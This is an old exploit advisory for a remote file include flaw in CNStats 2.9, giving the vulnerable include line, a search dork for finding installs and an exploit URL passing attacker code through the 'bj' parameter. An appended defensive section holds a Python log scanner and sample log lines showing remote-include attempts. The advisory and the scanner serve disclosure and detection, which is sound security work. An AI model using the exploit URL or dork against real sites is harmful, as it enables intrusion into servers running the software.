CNStats 2.9 (who_r.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# Scripts : CNStats 2.9
# Discovered By : irvian
# scripts site : http://www.cnstats.com/
# dork : "CNStats 2.9"
-----------------------------------------------------------------------------------------
bug found:

/reports/who_r.php
/reports/who_s.php

$bk = 't';
include $bj . 'reports/who.php';


Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]

# milw0rm.com [2007-04-15]
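
For defenders, an added example (not part of the original advisory or of CNStats) that scans web server access logs for requests setting `bj` on the two affected scripts. It assumes common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script paths and parameter name taken from the advisory.
SCRIPTS = ("/reports/who_r.php", "/reports/who_s.php")
PARAM = "bj"
# Request field of a common/combined access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A URL scheme or protocol-relative prefix is never valid for a local include prefix.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:|//)", re.I)

def classify(line):
    """Return (script, bj_value, verdict) if the line sets bj on an affected script, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    path = unquote(target.path).lower()
    # endswith() also matches installs below a subdirectory.
    script = next((s for s in SCRIPTS if path.endswith(s)), None)
    if script is None:
        return None
    values = parse_qs(target.query, keep_blank_values=True).get(PARAM)
    if not values:
        return None
    # parse_qs decodes once; decode again to catch double-encoded values.
    value = unquote(values[0]).strip()
    verdict = "remote-url" if REMOTE_RE.match(value) else "param-set"
    return script, value, verdict

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample entries (documentation addresses, .invalid host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Apr/2007:10:01:02 +0000] "GET /reports/who_r.php?bj=http://files.example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Apr/2007:10:01:09 +0000] "GET /stats/reports/who_s.php?bj=http%253A%252F%252Ffiles.example.invalid%252Fx.txt HTTP/1.1" 200 87',
    '198.51.100.4 - - [15/Apr/2007:10:02:00 +0000] "GET /reports/who_r.php?bj=lib/ HTTP/1.1" 200 90',
    '198.51.100.4 - - [15/Apr/2007:10:02:30 +0000] "GET /reports/who_r.php HTTP/1.1" 200 4096',
    '198.51.100.4 - - [15/Apr/2007:10:03:00 +0000] "GET /index.php?page=who HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for script, value, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:10} {script} bj={value!r}")
```

Only the query string is visible in access logs, so a `bj` value delivered in a POST body or cookie will not appear here. A `param-set` hit is still worth reviewing, on the assumption that `bj` is meant to be an internal path prefix and not request input.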